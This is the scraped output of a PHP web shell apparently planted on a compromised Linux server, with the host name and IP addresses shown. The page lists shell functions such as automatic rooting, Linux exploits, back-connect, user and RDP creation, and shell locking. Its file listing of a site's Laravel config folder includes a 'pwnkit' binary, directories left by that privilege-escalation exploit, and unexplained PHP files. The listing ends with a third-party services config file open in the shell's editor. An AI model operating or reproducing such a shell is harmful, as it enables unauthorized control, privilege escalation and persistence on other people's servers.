Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.19
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo4.com /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
.htaccess
127
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
app.php
9.31
KB
-rw-r--r--
auth.php
3.83
KB
-rw-r--r--
broadcasting.php
1.73
KB
-rw-r--r--
cache.php
3.23
KB
-rw-r--r--
constant.php
1023
B
-rw-r--r--
cors.php
880
B
-rw-r--r--
database.php
5.08
KB
-rw-r--r--
error_log
11.57
KB
-rw-r--r--
excel.php
12.29
KB
-rw-r--r--
filesystems.php
2.21
KB
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
hashing.php
1.58
KB
-rw-r--r--
logging.php
3.04
KB
-rw-r--r--
mail.php
3.4
KB
-rw-r--r--
money.php
55.98
KB
-rw-r--r--
permission.php
4.88
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
queue.php
2.79
KB
-rw-r--r--
services.php
983
B
-rw-r--r--
session.php
7.07
KB
-rw-r--r--
view.php
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : services.php
<?php return [ /* |-------------------------------------------------------------------------- | Third Party Services |-------------------------------------------------------------------------- | | This file is for storing the credentials for third party services such | as Mailgun, Postmark, AWS and more. This file provides the de facto | location for this type of information, allowing packages to have | a conventional file to locate the various service credentials. | */ 'mailgun' => [ 'domain' => env('MAILGUN_DOMAIN'), 'secret' => env('MAILGUN_SECRET'), 'endpoint' => env('MAILGUN_ENDPOINT', 'api.mailgun.net'), ], 'postmark' => [ 'token' => env('POSTMARK_TOKEN'), ], 'ses' => [ 'key' => env('AWS_ACCESS_KEY_ID'), 'secret' => env('AWS_SECRET_ACCESS_KEY'), 'region' => env('AWS_DEFAULT_REGION', 'us-east-1'), ], ];
Close